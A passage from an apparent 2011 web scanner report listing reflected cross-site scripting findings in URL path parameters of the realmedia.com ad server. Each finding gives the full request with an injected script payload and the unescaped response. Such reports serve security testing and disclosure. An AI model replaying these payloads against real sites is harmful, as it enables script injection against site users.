Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIKO10167S|O3016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:04 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11544219975@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250c8098"><script>alert(1)</script>84786c535a5/autnwsrlsttch/ss/a/L7/1544219975/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.58. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c098"><script>alert(1)</script>a29bb87f7c3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch5c098"><script>alert(1)</script>a29bb87f7c3/ss/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:06 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIMO1016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:06 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11590386625@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch5c098"><script>alert(1)</script>a29bb87f7c3/ss/a/L7/1590386625/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.59. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42efc"><script>alert(1)</script>916717c49c8 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss42efc"><script>alert(1)</script>916717c49c8/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIOO5016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11842730930@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss42efc"><script>alert(1)</script>916717c49c8/a/L7/1842730930/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.60. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9609f"><script>alert(1)</script>48098e26502 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x159609f"><script>alert(1)</script>48098e26502 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIR; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:11 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a/340360854/x159609f"><script>alert(1)</script>48098e26502/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c808"><script>alert(1)</script>ba65244ab6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews9c808"><script>alert(1)</script>ba65244ab6a/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews9c808"><script>alert(1)</script>ba65244ab6a/runofnetwork/728x90/autnwsrlsttch/ss/a/168652954/Top1/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.62. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febad"><script>alert(1)</script>82ddd457fa8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetworkfebad"><script>alert(1)</script>82ddd457fa8/728x90/autnwsrlsttch/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIIO4016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11864345014@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetworkfebad"><script>alert(1)</script>82ddd457fa8/728x90/autnwsrlsttch/ss/a/L7/1864345014/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.63. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbe7"><script>alert(1)</script>31ceefc8c18 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90acbe7"><script>alert(1)</script>31ceefc8c18/autnwsrlsttch/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIKO10167S|O7016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 518
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:04 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/1877429826@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90acbe7"><script>alert(1)</script>31ceefc8c18/autnwsrlsttch/ss/a/L7/877429826/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.64. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 915db"><script>alert(1)</script>9d0a28cc48b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch915db"><script>alert(1)</script>9d0a28cc48b/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:07 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxINO2016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:07 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11973812284@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch915db"><script>alert(1)</script>9d0a28cc48b/ss/a/L7/1973812284/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.65. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8c41"><script>alert(1)</script>2ec6b63e70e was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ssd8c41"><script>alert(1)</script>2ec6b63e70e/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIPO10167S|O4016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11358408129@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ssd8c41"><script>alert(1)</script>2ec6b63e70e/a/L7/1358408129/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.66. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c515b"><script>alert(1)</script>063cb3f5ca9 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1c515b"><script>alert(1)</script>063cb3f5ca9 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
